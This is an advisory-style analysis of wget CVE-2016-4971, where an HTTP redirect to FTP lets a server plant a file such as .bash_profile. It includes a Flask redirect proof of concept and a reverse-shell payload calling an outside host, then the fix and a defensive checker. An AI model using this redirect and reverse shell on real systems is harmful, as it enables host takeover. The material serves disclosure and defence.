Wget Vulnerability CVE-2016-4971 Analysis - Vulnerability Warning - Black Bar Safety Net

2016-06-22T00:00:00
ID MYHACK58:62201676202
Type myhack58
Reporter Anonymous
Modified 2016-06-22T00:00:00

Description

Vulnerability description

CVE-2016-4971 was recently disclosed officially. The vulnerability affects all older versions of wget. An attacker can use it to phish programmers and operations engineers in order to gain control of their hosts or implant rootkits.

Vulnerability details

wget is a download tool commonly used on *nix systems that supports http, https, ftp and other protocols. When wget downloads a resource from an http service and the server redirects the download to an ftp service, wget by default trusts the ftp link address and file name given in the http server's redirect and performs no secondary verification. As a result it may download a malicious file planted by a phisher, leading to the host being compromised.

For example, suppose we run wget http://attackers-server/safe_file.txt and the http server returns the following response headers:

    HTTP/1.1 302 Found
    Cache-Control: private
    Content-Type: text/html; charset=UTF-8
    Location: ftp://attackers-server/.bash_profile
    Content-Length: 262
    Server: Apache

If we run the wget request from our own home directory and that directory does not contain a .bash_profile, this .bash_profile is downloaded into our home directory. The phisher can write any malicious code into this .bash_profile file, and the next time we start a shell the malicious code is executed, which leads to our host being compromised.

Specific attack example demo

The wget version on the demo host is as follows:

[screenshot]

We write a simple http download service, named testWget.py:

    #!/usr/bin/env python
    # Demo HTTP service: answers the download request with a redirect to an FTP URL
    from flask import Flask, redirect

    app = Flask(__name__)

    @app.route("/noharm.txt")
    def test():
        return redirect("ftp://192.168.50.116/.bash_profile")

    if __name__ == "__main__":
        app.run(host="0.0.0.0", port=80)

At the same time, on the host 192.168.50.116, start an ftp service and write the attack payload (bash -i >& /dev/tcp/74.207.xxx.xxx/9980 0>&1) into the ftp service's .bash_profile file, and listen on port 9980 on your own VPS host.

Then, on another host with IP 192.168.50.61, run wget http://192.168.50.116/noharm.txt in the home directory (note that the home directory does not contain a .bash_history file). Exit the current shell and enter a shell again (this triggers execution of the malicious code in the .bash_profile file). At this point our VPS successfully obtains shell access to 192.168.50.61.

[screenshot]

The attack instance above is only an example to demonstrate the actual harm of the vulnerability; the specific attack scenario depends on the actual situation.

Repair solutions

Upgrade wget to GNU wget 1.18.

References

https://lists.gnu.org/archive/html/bug-wget/2016-06/msg00033.html
https://bugzilla.redhat.com/show_bug.cgi?id=1343666
https://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
http://git.savannah.gnu.org/cgit/wget.git/commit/?id=e996e322ffd42aaa051602da182d03178d0f13e1
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
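The file-naming decision described under "Vulnerability details", as an added example that is not part of the original article and is not wget's own code. It contrasts trusting the redirect's file name with keeping the name from the requested URL (the default in wget 1.18), and lists why a redirect deserves review; all function names are hypothetical.

```python
# Added example: models the naming decision behind CVE-2016-4971 (not wget's code).
from posixpath import basename
from urllib.parse import unquote, urljoin, urlsplit


def name_from_url(url):
    """Last path segment of a URL, as a downloader would use for the local file."""
    return basename(unquote(urlsplit(url).path)) or "index.html"


def vulnerable_name(requested_url, location):
    """Behaviour described above: the redirect target decides the file name."""
    return name_from_url(urljoin(requested_url, location))


def fixed_name(requested_url, location):
    """wget 1.18 default: keep the name from the URL the user asked for."""
    return name_from_url(requested_url)


def redirect_findings(requested_url, location):
    """Return the reasons a redirect should be reviewed before its file is saved."""
    target = urljoin(requested_url, location)  # resolve relative Location values
    src, dst = urlsplit(requested_url), urlsplit(target)
    findings = []
    if src.scheme in ("http", "https") and dst.scheme == "ftp":
        findings.append("http-to-ftp redirect")
    new_name = name_from_url(target)
    if new_name != name_from_url(requested_url):
        findings.append("filename changed by redirect")
    if new_name.startswith("."):
        findings.append("target is a hidden dotfile")
    return findings


# Constructed sample: the request and Location header from the article's example.
REQUESTED = "http://attackers-server/safe_file.txt"
LOCATION = "ftp://attackers-server/.bash_profile"

if __name__ == "__main__":
    print("name if redirect is trusted:", vulnerable_name(REQUESTED, LOCATION))
    print("name from requested URL:    ", fixed_name(REQUESTED, LOCATION))
    print("findings:", redirect_findings(REQUESTED, LOCATION))
```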